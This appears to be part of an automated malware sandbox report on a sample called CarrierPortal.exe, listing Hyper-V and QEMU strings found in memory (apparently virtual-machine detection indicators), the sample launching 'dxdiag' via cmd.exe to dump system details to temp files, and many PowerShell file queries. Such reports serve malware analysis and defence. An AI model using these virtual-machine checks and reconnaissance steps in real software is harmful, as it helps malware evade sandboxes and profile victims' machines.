Source: Taskmgr.exe, 00000019.00000003.1963572960.0000025B1CDDC000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CD17000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1950231203.0000025B1CDDB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Logical Processormui
Source: Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CD17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmicshutdown
Source: Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CDEF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: JHyper-V Hypervisor Logical Processor
Source: CarrierPortal.exe Binary or memory string: 23.0.1+11-jvmci-b01
Source: CarrierPortal.exe Binary or memory string: @Native image does not support the following JVMCI CPU features:
Source: Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CDEF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Dynamic Memory Integration Service~
Source: Taskmgr.exe, 00000019.00000003.1967898140.0000025B1CD14000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmicvss
Source: Taskmgr.exe, 00000019.00000003.1975341909.0000025B1CCF5000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1939681656.0000025B1CCD1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2Hyper-V Heartbeat ServiceV
Source: Taskmgr.exe, 00000019.00000003.1963572960.0000025B1CDDC000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CD17000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1950231203.0000025B1CDDB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Virtual Processori
Source: Taskmgr.exe, 00000019.00000003.1950231203.0000025B1CDF6000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CDEF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2Hyper-V VM Vid Partition
Source: Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CDEF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Virtual ProcessorbR$
Source: Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CDEF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V mfvvegwrrrfsegt Bus Pipes
Source: CarrierPortal.exeBinary or memory string: 23.0.1+11-jvmci-b01C
Source: Taskmgr.exe, 00000019.00000003.1963572960.0000025B1CDC9000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CD17000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1950231203.0000025B1CDCD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid Partitionll
Source: Taskmgr.exe, 00000019.00000003.1943443474.0000025B1C317000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1954113877.0000025B1C320000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1967210901.0000025B1C321000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V mfvvegwrrrfsegt Bus
Source: ModuleAnalysisCache.16.drBinary or memory string: Remove-NetEventVmNetworkAdapter
Source: Taskmgr.exe, 00000019.00000003.1950231203.0000025B1CDF6000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CDEF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X2Hyper-V VM Vid Partition
Source: Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CD17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicheartbeatk
Source: Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CD17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processor
Source: Taskmgr.exe, 00000019.00000003.1950231203.0000025B1CE5C000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1963572960.0000025B1CE5C000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CDEF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processor
Source: dxdiag.exe, 00000004.00000002.1272359556.000001D764630000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @wvid.infvid.devicedescMicrosoft Hyper-V Virtualization Infrastructure Driverwvid.inf8A
Source: Taskmgr.exe, 00000019.00000003.1885313401.0000025B1C8F0000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1956815473.0000025B1C91B000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000002.1995772531.0000025B1C91B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processor
Source: Taskmgr.exe, 00000019.00000002.1996865363.0000025B1CD62000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1947836564.0000025B1CD62000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CD17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >Hyper-V Guest Service Interface
Source: CarrierPortal.exeBinary or memory string: ,jdk.vm.ci.hotspot.HotSpotJVMCIBackendFactory
Source: Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CDEF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sWDHyper-V Hypervisor Root Partition
Source: CarrierPortal.exeBinary or memory string: VirtualMachineError.java
Source: Taskmgr.exe, 00000019.00000002.1994778760.0000025B1C8A6000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1920193468.0000025B1C890000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisor[
Source: Taskmgr.exe, 00000019.00000003.1885313401.0000025B1C8F0000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1956815473.0000025B1C91B000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000002.1995772531.0000025B1C91B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DHyper-V Hypervisor Root Partition
Source: Taskmgr.exe, 00000019.00000002.1994778760.0000025B1C8A6000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1920193468.0000025B1C890000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisor
Source: Taskmgr.exe, 00000019.00000003.1947836564.0000025B1CD62000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CD17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :Hyper-V Data Exchange Service
Source: Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CDEF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AlDHyper-V Virtual Machine Bus Pipes.
Source: CarrierPortal.exeBinary or memory string: jdk.vm.ci.services.JVMCIServiceLocator
Source: CarrierPortal.exeBinary or memory string: java.lang.VirtualMachineError
Source: Taskmgr.exe, 00000019.00000003.1947836564.0000025B1CD62000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CD17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: BHyper-V PowerShell Direct Service
Source: CarrierPortal.exeBinary or memory string: &jdk.vm.ci.services.JVMCIServiceLocator
Source: CarrierPortal.exe, 00000000.00000002.1282205867.00000146244CC000.00000004.00000020.00020000.00000000.sdmp, CarrierPortal.exe, 00000012.00000002.1828597563.000001E777169000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Taskmgr.exe, 00000019.00000003.1918027398.0000025B1C984000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1968715738.0000025B1C9A5000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1885313401.0000025B1C8F0000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1875620351.0000025B1C985000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1979771097.0000025B1C9A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HHyper-V Time Synchronization Servicell.mun
Source: Taskmgr.exe, 00000019.00000003.1942278051.0000025B1CD57000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1947836564.0000025B1CD54000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CD17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ZHyper-V Remote Desktop Virtualization Service[
Source: CarrierPortal.exeBinary or memory string: 1com.oracle.svm.enterprise.virtualization.vmm.qemu-
Source: dxdiag.exe, 00000004.00000002.1272570923.000001D764661000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000004.00000003.1265814890.000001D76465D000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000015.00000003.1806753933.00000143D4A89000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000015.00000002.1820190933.00000143D4A89000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000015.00000003.1802129587.00000143D4A88000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $Microsoft Hyper-V Generation Counter8A
Source: CarrierPortal.exe, 00000000.00000002.1285285503.0000014625380000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 23.0.1+11-jvmci-b01`
Source: Taskmgr.exe, 00000019.00000003.1947205276.0000025B1C303000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000002.1991617518.0000025B1C303000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus Pipesl
Source: CarrierPortal.exeBinary or memory string: RSAPrivateCrtKeyImpl_MVIvmCIOqmIyY4BxzNhymF
Source: ModuleAnalysisCache.16.drBinary or memory string: Add-NetEventVmNetworkAdapter
Source: Taskmgr.exe, 00000019.00000003.1942278051.0000025B1CD91000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000002.1996958200.0000025B1CD92000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1947836564.0000025B1CD91000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1974956912.0000025B1CD81000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CD17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HHyper-V Volume Shadow Copy Requestor
Source: CarrierPortal.exeBinary or memory string: 1com.oracle.svm.enterprise.virtualization.vmm.qemu9r
Source: CarrierPortal.exeBinary or memory string: jdk.vm.ci.hotspot.HotSpotJVMCIBackendFactory
Source: CarrierPortal.exeBinary or memory string: +RSAPrivateCrtKeyImpl_MVIvmCIOqmIyY4BxzNhymFo
Source: CarrierPortal.exeBinary or memory string: com.oracle.svm.enterprise.virtualization.vmm.qemu.b
Source: Taskmgr.exe, 00000019.00000003.1920193468.0000025B1C890000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e Shadow Copy RequestorvmicvssHyper-V Powe
Source: Taskmgr.exe, 00000019.00000002.1996812059.0000025B1CD56000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1942278051.0000025B1CD57000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1968477806.0000025B1CD56000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1947836564.0000025B1CD54000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CD17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor
Source: CarrierPortal.exeBinary or memory string: com.oracle.svm.enterprise.virtualization.vmm.qemu.c
Source: C:\Users\user\Desktop\CarrierPortal.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\CarrierPortal.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c dxdiag /t C:\Users\user\AppData\Local\Temp\iPopWYeOjnPUTsl44DoJ4i6LpO3Hfrmj.txt
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\dxdiag.exe dxdiag /t C:\Users\user\AppData\Local\Temp\iPopWYeOjnPUTsl44DoJ4i6LpO3Hfrmj.txt
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\Desktop\CarrierPortal.exe "C:\Users\user\Desktop\CarrierPortal.exe"
Source: C:\Users\user\Desktop\CarrierPortal.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c dxdiag /t C:\Users\user\AppData\Local\Temp\z6bA4AJyM3lgigrkALKVxYH0Lsl0yEgV.txt
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\dxdiag.exe dxdiag /t C:\Users\user\AppData\Local\Temp\z6bA4AJyM3lgigrkALKVxYH0Lsl0yEgV.txt
Source: C:\Windows\System32\dxdiag.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0516~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\dxdiag.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0110~31bf3856ad364e35~amd64~~10.0.19041.3271.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.3208.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
